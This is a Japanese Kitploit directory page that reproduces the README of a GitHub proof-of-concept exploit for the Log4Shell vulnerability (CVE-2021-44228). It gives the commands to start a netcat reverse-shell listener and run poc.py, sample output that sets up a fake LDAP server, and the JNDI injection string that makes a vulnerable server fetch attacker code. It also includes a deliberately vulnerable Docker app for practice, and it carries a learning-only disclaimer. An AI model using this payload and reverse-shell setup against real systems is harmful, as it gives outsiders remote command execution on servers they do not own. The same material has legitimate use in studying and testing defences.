Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228-demo | Kitploit
ツール/GitHubGitHub/hoanle396/cve-2021-44228-demo
ペイロード生成脆弱性分析エクスプロイトペネトレーションテスト学習と教育リモートアクセスツール
GitHubhoanle396/cve-2021-44228-demo

CVE-2021-44228-demo

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

log4j-shell-poc

最近発見されたCVE-2021-44228脆弱性の概念実証(PoC)です。

最近、log4jに新たな脆弱性が見つかりました。log4jは、elasticsearch、minecraft、その他多数で非常に広く使用されているJavaロギングライブラリです。

このリポジトリには、脆弱なアプリケーションの例と、それに対する概念実証(POC)エクスプロイトがあります。

概念実証(POC)

PoCとして、プロセスを自動化するPythonファイルがあります。

必要条件:

root@kitploit:~
pip install -r requirements.txt

使用方法:

  • リバースシェル接続を受け付けるnetcatリスナーを起動します。
root@kitploit:~
nc -lvnp <netcat-port=example=2034>
  • エクスプロイトを実行します。
    注意: これを機能させるには、展開したJavaアーカイブの名前がjdk1.8.0_20であり、同じディレクトリにある必要があります。
root@kitploit:~
$ python3 poc.py --userip <your-ip-address> --webport <web-server-port=default=8000> --lport <netcat-listen-port=default=2034>

[!] CVE: CVE-2021-44228

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<your-ip-address>:1389/a}

Listening on 0.0.0.0:1389

このスクリプトは、HTTPサーバーとLDAPサーバーをセットアップし、脆弱なパラメータに貼り付けるためのペイロードも作成します。その後、すべてがうまくいけば、lportでシェルを取得できるはずです。


脆弱なアプリケーション

脆弱なWebアプリケーションを含むDockerfileがあります。以下の手順に従って使用できます:

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run  -p 8080:8080 log4j-shell-poc

起動したら、localhost:8080でアクセスできます。


Javaバージョンの入手

注意: パッケージをダウンロードするには、アカウントを作成する必要があります。

アーカイブをダウンロードして展開すると、jdk1.8.0_20/binにjavaと関連するいくつかのバイナリがあります。
注意: 機能させるには、jdkフォルダをこのリポジトリに同じ名前で展開してください。

root@kitploit:~
❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

免責事項

このリポジトリは、CVE-2021-44228に対するワンクリックエクスプロイトを意図したものではありません。このプロジェクトの目的は、人々がこの脆弱性について学び、おそらく自分のアプリケーションをテストできるようにすることです(ただし、この目的にはより適したアプリケーションもあります。例:https://log4shell.tools/)。

ツールをダウンロード